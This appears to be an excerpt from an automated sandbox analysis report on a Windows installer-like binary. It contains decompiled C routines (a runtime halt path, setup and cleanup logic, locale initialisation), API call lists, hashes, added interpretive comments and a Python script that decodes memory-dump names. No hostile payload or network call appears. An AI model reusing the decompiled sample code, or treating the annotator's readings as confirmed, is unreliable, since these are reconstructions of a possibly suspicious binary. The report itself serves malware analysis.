                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                    • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                                                    • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                    • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 75%
                                                                                    			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                                    				intOrPtr _t26;
                                                                                    				intOrPtr _t31;
                                                                                    				intOrPtr _t37;
                                                                                    				intOrPtr _t38;
                                                                                    				intOrPtr _t42;
                                                                                    				intOrPtr _t44;
                                                                                    				intOrPtr _t47;
                                                                                    				intOrPtr _t51;
                                                                                    				intOrPtr _t53;
                                                                                    				intOrPtr _t55;
                                                                                    				intOrPtr _t56;
                                                                                    				intOrPtr _t59;
                                                                                    				intOrPtr _t61;
                                                                                    				WCHAR* _t63;
                                                                                    				intOrPtr _t69;
                                                                                    				intOrPtr _t74;
                                                                                    				int _t75;
                                                                                    				intOrPtr _t76;
                                                                                    				intOrPtr _t78;
                                                                                    				struct HWND__* _t81;
                                                                                    				intOrPtr _t82;
                                                                                    				intOrPtr _t86;
                                                                                    				void* _t90;
                                                                                    				intOrPtr _t93;
                                                                                    				intOrPtr _t99;
                                                                                    				intOrPtr _t101;
                                                                                    				intOrPtr _t107;
                                                                                    				intOrPtr _t114;
                                                                                    				intOrPtr _t115;
                                                                                    				intOrPtr _t116;
                                                                                    				intOrPtr _t117;
                                                                                    				void* _t120;
                                                                                    				intOrPtr _t121;
                                                                                    
                                                                                    				_t119 = __esi;
                                                                                    				_t118 = __edi;
                                                                                    				_t85 = __ebx;
                                                                                    				_pop(_t101);
                                                                                    				_pop(_t88);
                                                                                    				 *[fs:eax] = _t101;
                                                                                    				E004AF678(_t88);
                                                                                    				if( *0x4ba440 == 0) {
                                                                                    					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
                                                                                    						_t61 =  *0x4ba674; // 0x4c0d0c
                                                                                    						_t4 = _t61 + 0x2f8; // 0x0
                                                                                    						_t63 = E004084EC( *_t4);
                                                                                    						_t88 = _t120 - 0x28;
                                                                                    						_t101 =  *0x4c1c48; // 0x0
                                                                                    						E00426F08(0xc2, _t120 - 0x28, _t101);
                                                                                    						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
                                                                                    							 *0x4ba44c = 2;
                                                                                    							E0041F238();
                                                                                    						}
                                                                                    					}
                                                                                    					E004056D0();
                                                                                    					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
                                                                                    					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
                                                                                    					_t26 =  *0x4c1d84; // 0x0
                                                                                    					E00422954(_t26, _t88, _t120 - 0x34);
                                                                                    					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
                                                                                    					_push( *((intOrPtr*)(_t120 - 0x30)));
                                                                                    					_t31 =  *0x4c1d94; // 0x0
                                                                                    					E00422660(_t31, _t120 - 0x38);
                                                                                    					_pop(_t90);
                                                                                    					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
                                                                                    					_t107 =  *0x4c1d98; // 0x0
                                                                                    					E00407E00(0x4c1d9c, _t107);
                                                                                    					_t37 =  *0x4c1d90; // 0x4ca924
                                                                                    					_t15 = _t37 + 0x14; // 0x619c58
                                                                                    					_t38 =  *0x4c1d88; // 0x0
                                                                                    					E00423CE8(_t38,  *_t15);
                                                                                    					_push(_t120);
                                                                                    					_push(0x4b63ab);
                                                                                    					_push( *[fs:edx]);
                                                                                    					 *[fs:edx] = _t121;
                                                                                    					 *0x4c1de0 = 0;
                                                                                    					_t42 = E00423D00(1, 0, 1, 0); // executed
                                                                                    					 *0x4c1d8c = _t42;
                                                                                    					_push(_t120);
                                                                                    					_push(0x4b639a);
                                                                                    					_push( *[fs:eax]);
                                                                                    					 *[fs:eax] = _t121;
                                                                                    					_t44 =  *0x4c1d90; // 0x4ca924
                                                                                    					_t16 = _t44 + 0x18; // 0x2dfe00
                                                                                    					 *0x4c1de0 = E004053F0( *_t16);
                                                                                    					_t47 =  *0x4c1d90; // 0x4ca924
                                                                                    					_t17 = _t47 + 0x18; // 0x2dfe00
                                                                                    					_t86 =  *0x4c1de0; // 0x7fbd0010
                                                                                    					E00405884(_t86,  *_t17);
                                                                                    					_push(_t120);
                                                                                    					_push(0x4b62e9);
                                                                                    					_push( *[fs:eax]);
                                                                                    					 *[fs:eax] = _t121;
                                                                                    					_t51 =  *0x424cd8; // 0x424d30
                                                                                    					_t93 =  *0x4c1d88; // 0x0
                                                                                    					_t53 = E00424748(_t93, 1, _t51); // executed
                                                                                    					 *0x4c1de4 = _t53;
                                                                                    					_push(_t120);
                                                                                    					_push(0x4b62d8);
                                                                                    					_push( *[fs:eax]);
                                                                                    					 *[fs:eax] = _t121;
                                                                                    					_t55 =  *0x4c1d90; // 0x4ca924
                                                                                    					_t18 = _t55 + 0x18; // 0x2dfe00
                                                                                    					_t56 =  *0x4c1de4; // 0x2170a30
                                                                                    					E00424A24(_t56,  *_t18, _t86);
                                                                                    					_pop(_t114);
                                                                                    					 *[fs:eax] = _t114;
                                                                                    					_push(E004B62DF);
                                                                                    					_t59 =  *0x4c1de4; // 0x2170a30
                                                                                    					return E00405CE8(_t59);
                                                                                    				} else {
                                                                                    					_t69 =  *0x4ba674; // 0x4c0d0c
                                                                                    					_t1 = _t69 + 0x1d0; // 0x0
                                                                                    					E004AFA44( *_t1, __ebx, __edi, __esi);
                                                                                    					 *0x4ba44c = 0;
                                                                                    					_pop(_t115);
                                                                                    					 *[fs:eax] = _t115;
                                                                                    					_push(E004B6554);
                                                                                    					_t74 =  *0x4c1d88; // 0x0
                                                                                    					_t75 = E00405CE8(_t74);
                                                                                    					if( *0x4c1d9c != 0) {
                                                                                    						_t117 =  *0x4c1d9c; // 0x0
                                                                                    						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
                                                                                    					}
                                                                                    					if( *0x4c1d94 != 0) {
                                                                                    						_t82 =  *0x4c1d94; // 0x0
                                                                                    						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
                                                                                    					}
                                                                                    					if( *0x4ba450 != 0) {
                                                                                    						_t81 =  *0x4ba450; // 0x9025c
                                                                                    						_t75 = DestroyWindow(_t81); // executed
                                                                                    					}
                                                                                    					if( *0x4c1d78 != 0) {
                                                                                    						_t76 =  *0x4c1d78; // 0x0
                                                                                    						_t99 =  *0x4c1d7c; // 0x1
                                                                                    						_t116 =  *0x426bb0; // 0x426bb4
                                                                                    						E00408D08(_t76, _t99, _t116);
                                                                                    						_t78 =  *0x4c1d78; // 0x0
                                                                                    						E0040540C(_t78);
                                                                                    						 *0x4c1d78 = 0;
                                                                                    						return 0;
                                                                                    					}
                                                                                    					return _t75;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                                                      • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                    • DestroyWindow.USER32(0009025C,004B6554), ref: 004B6514
                                                                                      • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                                                    • String ID: .tmp$0MB
                                                                                    • API String ID: 3858953238-176122739
                                                                                    • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                    • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                                                    • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                    • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			// Reading of this routine (an interpretation, not stated by the report): a runtime
                                                                                    			// shutdown/halt path. It prints a "Runtime error at ..." message when an error address
                                                                                    			// is pending, runs a chain of exit procedures, unwinds a linked list of module records
                                                                                    			// and ends in ExitProcess. Together with the MZP string listed for this function, the
                                                                                    			// layout is consistent with the Halt routine of a Borland/Delphi-style RTL rather than
                                                                                    			// with sample-specific logic; treat it as runtime code unless it is shown to be hooked.
                                                                                    			E00407750() {
                                                                                    				intOrPtr _t15;             // declared here; the listing used it without a declaration
                                                                                    				void* _t20;
                                                                                    				void* _t23;
                                                                                    				intOrPtr _t31;
                                                                                    				intOrPtr* _t33;
                                                                                    				void* _t44;                // declared here; the listing used it without a declaration
                                                                                    				void* _t46;
                                                                                    				struct HINSTANCE__* _t49;
                                                                                    				void* _t56;
                                                                                    
                                                                                    				// *0x4b7004: pending error address. E004076B8 writes "Runtime error at ..." to a
                                                                                    				// standard handle (GetStdHandle/WriteFile in the subcall list below; the 0xF5
                                                                                    				// argument shown there is the sign-extended immediate for STD_OUTPUT_HANDLE, -11).
                                                                                    				if( *0x4b7004 != 0) {
                                                                                    					E00407630();
                                                                                    					E004076B8(_t46);
                                                                                    					 *0x4b7004 = 0;
                                                                                    				}
                                                                                    				// Only the thread whose id was recorded in *0x4bdbf4 tears down the record at 0x4bdbc8.
                                                                                    				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                                                    					E00407388(0x4bdbc8);
                                                                                    					E0040768C(0x4bdbc8);
                                                                                    				}
                                                                                    				// *0x4bdbc0: module-state byte (the code distinguishes the values 0, 1 and 2).
                                                                                    				// *0x4b7000: process exit code, passed to ExitProcess below.
                                                                                    				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                                                    					L8:
                                                                                    					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                                                    						 *0x004BDBA4 = 0;
                                                                                    					}
                                                                                    					if( *((char*)(0x4bdbc0)) != 0) {
                                                                                    						L14:
                                                                                    						E004073B0();
                                                                                    						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                                                    							_t15 =  *0x004BDBA8;
                                                                                    							if( *0x004BDBA8 != 0) {
                                                                                    								E0040B40C(_t15);
                                                                                    								_t31 =  *((intOrPtr*)(0x4bdba8));
                                                                                    								// Free the module handle stored at record+0x10 unless it is this
                                                                                    								// image's own instance handle at record+4 (0x400000).
                                                                                    								_t8 = _t31 + 0x10; // 0x400000
                                                                                    								_t49 =  *_t8;
                                                                                    								_t9 = _t31 + 4; // 0x400000
                                                                                    								if(_t49 !=  *_t9 && _t49 != 0) {
                                                                                    									FreeLibrary(_t49);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						E00407388(0x4bdb98);
                                                                                    						if( *((char*)(0x4bdbc0)) == 1) {
                                                                                    							 *0x004BDBBC();   // indirect call through a stored function pointer
                                                                                    						}
                                                                                    						if( *((char*)(0x4bdbc0)) != 0) {
                                                                                    							E0040768C(0x4bdb98);
                                                                                    						}
                                                                                    						if( *0x4bdb98 == 0) {
                                                                                    							// End of the record chain: optional final callback, then exit with *0x4b7000.
                                                                                    							if( *0x4bb038 != 0) {
                                                                                    								 *0x4bb038();
                                                                                    							}
                                                                                    							ExitProcess( *0x4b7000); // executed
                                                                                    						}
                                                                                    						// Copy the next 48-byte (0xc << 2) record of the chain over the current one and loop.
                                                                                    						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                                                    						_t56 = _t56 + 0xc;
                                                                                    						0x4b7000 = 0x4b7000;   // decompiler artifact: no-op assignment to a literal address
                                                                                    						0x4bdb98 = 0x4bdb98;   // decompiler artifact
                                                                                    						goto L8;
                                                                                    					} else {
                                                                                    						// Drain pending items: E004054B4 returns the next one, E00405CE8 handles it.
                                                                                    						_t20 = E004054B4();
                                                                                    						_t44 = _t20;
                                                                                    						if(_t20 == 0) {
                                                                                    							goto L14;
                                                                                    						} else {
                                                                                    							goto L13;
                                                                                    						}
                                                                                    						do {
                                                                                    							L13:
                                                                                    							E00405CE8(_t44);
                                                                                    							_t23 = E004054B4();
                                                                                    							_t44 = _t23;
                                                                                    						} while (_t23 != 0);
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				} else {
                                                                                    					// Exit-procedure chain: take the pointer at *0x4bb054, clear the slot, call it.
                                                                                    					// A callee may store the next procedure back into the slot, so loop until it stays empty.
                                                                                    					do {
                                                                                    						_t33 =  *0x4bb054; // 0x0
                                                                                    						 *0x4bb054 = 0;
                                                                                    						 *_t33();
                                                                                    					} while ( *0x4bb054 != 0);
                                                                                    					L8:               // duplicated label and empty loop: decompiler artifact, not reached
                                                                                    					while(1) {
                                                                                    					}
                                                                                    				}
                                                                                    			}










                                                                                    (Per-line instruction addresses for the listing above, 0x00407764 to 0x00407876; the side-by-side mapping to source lines did not survive extraction.)

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                    • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                                                    • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                    • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
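The dump names under "Memory Dump Source" encode where each region sat in the sandboxed process. The decoder below is an added example, not part of the report or of Joe Sandbox's own tooling. It assumes the field layout `<pid>.<stage>.<seq>.<base>.<protect>.<type>.sdmp`, inferred from the six names listed on this page (the report does not document it), and that the fifth and sixth fields carry the Win32 `PAGE_*` protection and `MEM_*` region type; the `PAGE_*`/`MEM_*` values themselves are the fixed Windows SDK constants. The six names are embedded as constructed input.

```python
"""Decode Joe Sandbox style memory-dump file names.

Assumed layout (inferred from the names on this page, not documented by the
report): <pid>.<stage>.<seq>.<base>.<protect>.<type>.sdmp, all but <seq> hex.
Protection and type are decoded with the Win32 MEMORY_BASIC_INFORMATION
constants, which are fixed by the Windows SDK.
"""
import re

# PAGE_* protection values (MEMORY_BASIC_INFORMATION.Protect), Windows SDK.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEM_* region types (MEMORY_BASIC_INFORMATION.Type), Windows SDK.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed file-name layout (see module docstring).
_DUMP_NAME = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\."
    r"(?P<stage>[0-9A-Fa-f]{8})\."
    r"(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)


def decode_protect(value: int) -> str:
    """Render a PAGE_* value, including any modifier bits, as text."""
    base = PAGE_PROTECT.get(value & 0xFF)
    if base is None:
        return f"UNKNOWN(0x{value:x})"
    mods = [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join([base] + mods)


def is_executable(value: int) -> bool:
    """True for the four PAGE_EXECUTE* protections (bits 0x10..0x80)."""
    return bool(value & 0xF0)


def parse_dump_name(name: str) -> dict:
    """Split one dump name into typed fields; raises ValueError on a mismatch."""
    m = _DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name}")
    protect = int(m["protect"], 16)
    mtype = int(m["type"], 16)
    return {
        "pid": int(m["pid"], 16),        # assumed: hex process id
        "stage": int(m["stage"], 16),    # assumed: analysis stage/run number
        "seq": int(m["seq"]),
        "base": int(m["base"], 16),
        "protect": decode_protect(protect),
        "executable": is_executable(protect),
        "type": MEM_TYPE.get(mtype, f"UNKNOWN(0x{mtype:x})"),
    }


def executable_dumps(names):
    """The subset of dump names whose region was executable (where code lives)."""
    return [n for n in names if parse_dump_name(n)["executable"]]


# Constructed input: the six dump names listed under "Memory Dump Source" on this page.
DUMPS = [
    "0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp",
    "0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp",
    "0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp",
    "0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp",
    "0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp",
    "0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for n in DUMPS:
        f = parse_dump_name(n)
        print(f"pid={f['pid']} base=0x{f['base']:08x} {f['protect']:<22} {f['type']}")
```

Under these assumptions the region at 0x401000 (the one this listing was decompiled from) is the only executable dump, and all six carry 0x20000 in the last field. If that field really is the region type, 0x20000 is MEM_PRIVATE, not MEM_IMAGE: the PE at 0x400000 would then live in private memory rather than in a loader-mapped image, which is the first thing to confirm against the process's module list before trusting "based on PE: true" as a loaded-module statement.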

                                                                                    C-Code - Quality: 86%
                                                                                    			// Same body as E00407750 above, decoded from an entry point 8 bytes earlier (0x407748).
                                                                                    			// The first statement (at 0x0040774a) reads and writes through the uninitialised _t14
                                                                                    			// and looks like a decode that started inside an instruction sequence; it carries no
                                                                                    			// meaning. From 0x00407764 on the two listings are identical.
                                                                                    			E00407748() {
                                                                                    				intOrPtr* _t14;
                                                                                    				intOrPtr _t18;             // declared here; the listing used it without a declaration
                                                                                    				void* _t23;
                                                                                    				void* _t26;
                                                                                    				intOrPtr _t34;
                                                                                    				intOrPtr* _t36;
                                                                                    				void* _t48;                // declared here; the listing used it without a declaration
                                                                                    				void* _t50;
                                                                                    				struct HINSTANCE__* _t53;
                                                                                    				void* _t62;
                                                                                    
                                                                                    				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;   // decode artifact, see above
                                                                                    				// Pending error address: write "Runtime error at ..." (GetStdHandle/WriteFile) and clear it.
                                                                                    				if( *0x4b7004 != 0) {
                                                                                    					E00407630();
                                                                                    					E004076B8(_t50);
                                                                                    					 *0x4b7004 = 0;
                                                                                    				}
                                                                                    				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                                                    					E00407388(0x4bdbc8);
                                                                                    					E0040768C(0x4bdbc8);
                                                                                    				}
                                                                                    				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                                                    					L9:
                                                                                    					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                                                    						 *0x004BDBA4 = 0;
                                                                                    					}
                                                                                    					if( *((char*)(0x4bdbc0)) != 0) {
                                                                                    						L15:
                                                                                    						E004073B0();
                                                                                    						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                                                    							_t18 =  *0x004BDBA8;
                                                                                    							if( *0x004BDBA8 != 0) {
                                                                                    								E0040B40C(_t18);
                                                                                    								_t34 =  *((intOrPtr*)(0x4bdba8));
                                                                                    								// Free the handle at record+0x10 unless it is this image's own instance handle.
                                                                                    								_t8 = _t34 + 0x10; // 0x400000
                                                                                    								_t53 =  *_t8;
                                                                                    								_t9 = _t34 + 4; // 0x400000
                                                                                    								if(_t53 !=  *_t9 && _t53 != 0) {
                                                                                    									FreeLibrary(_t53);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						E00407388(0x4bdb98);
                                                                                    						if( *((char*)(0x4bdbc0)) == 1) {
                                                                                    							 *0x004BDBBC();
                                                                                    						}
                                                                                    						if( *((char*)(0x4bdbc0)) != 0) {
                                                                                    							E0040768C(0x4bdb98);
                                                                                    						}
                                                                                    						if( *0x4bdb98 == 0) {
                                                                                    							// End of the record chain: optional final callback, then ExitProcess(exit code).
                                                                                    							if( *0x4bb038 != 0) {
                                                                                    								 *0x4bb038();
                                                                                    							}
                                                                                    							ExitProcess( *0x4b7000); // executed
                                                                                    						}
                                                                                    						// Advance to the next 48-byte record in the chain and loop.
                                                                                    						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                                                    						_t62 = _t62 + 0xc;
                                                                                    						0x4b7000 = 0x4b7000;   // decompiler artifact: no-op assignment to a literal address
                                                                                    						0x4bdb98 = 0x4bdb98;   // decompiler artifact
                                                                                    						goto L9;
                                                                                    					} else {
                                                                                    						_t23 = E004054B4();
                                                                                    						_t48 = _t23;
                                                                                    						if(_t23 == 0) {
                                                                                    							goto L15;
                                                                                    						} else {
                                                                                    							goto L14;
                                                                                    						}
                                                                                    						do {
                                                                                    							L14:
                                                                                    							E00405CE8(_t48);
                                                                                    							_t26 = E004054B4();
                                                                                    							_t48 = _t26;
                                                                                    						} while (_t26 != 0);
                                                                                    						goto L15;
                                                                                    					}
                                                                                    				} else {
                                                                                    					// Exit-procedure chain: pop the pointer at *0x4bb054, clear the slot, call it, repeat.
                                                                                    					do {
                                                                                    						_t36 =  *0x4bb054; // 0x0
                                                                                    						 *0x4bb054 = 0;
                                                                                    						 *_t36();
                                                                                    					} while ( *0x4bb054 != 0);
                                                                                    					L9:               // duplicated label and empty loop: decompiler artifact, not reached
                                                                                    					while(1) {
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                     (Per-line instruction address column of the listing above; its alignment with the C lines was lost in extraction. Addresses run from 0x0040774a to 0x00407876; 0x00000000 entries mark lines with no address.)

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                    • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                                                    • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                    • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			E004B5000(void* __ecx, void* __edx) {
                                                                                    				intOrPtr _t19;
                                                                                    				intOrPtr _t22;
                                                                                    
                                                                                    				_push(_t22);
                                                                                    				_push(0x4b50d7);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t22;
                                                                                     				 *0x4bb98c =  *0x4bb98c - 1;
                                                                                     				if( *0x4bb98c < 0) {                 // one-shot guard: the block below runs only on the first entry
                                                                                     					E00405B74();
                                                                                     					E004051A8();
                                                                                     					SetThreadLocale(0x400); // executed; 0x400 = LOCALE_USER_DEFAULT
                                                                                     					E0040A250();                     // subcall: InitializeCriticalSection, GetVersion, resolves the *ThreadPreferredUILanguages exports via GetModuleHandleW/GetProcAddress (see APIs below)
                                                                                     					 *0x4b700c = 2;
                                                                                     					 *0x4bb01c = 0x4036b0;
                                                                                     					 *0x4bb020 = 0x4036b8;
                                                                                     					 *0x4bb05a = 2;
                                                                                     					 *0x4bb060 = E0040CAA4();        // subcall: GetSystemInfo
                                                                                     					 *0x4bb008 = 0x4095a0;
                                                                                     					E00405BCC(E00405BB0());
                                                                                     					 *0x4bb068 = 0xd7b0;
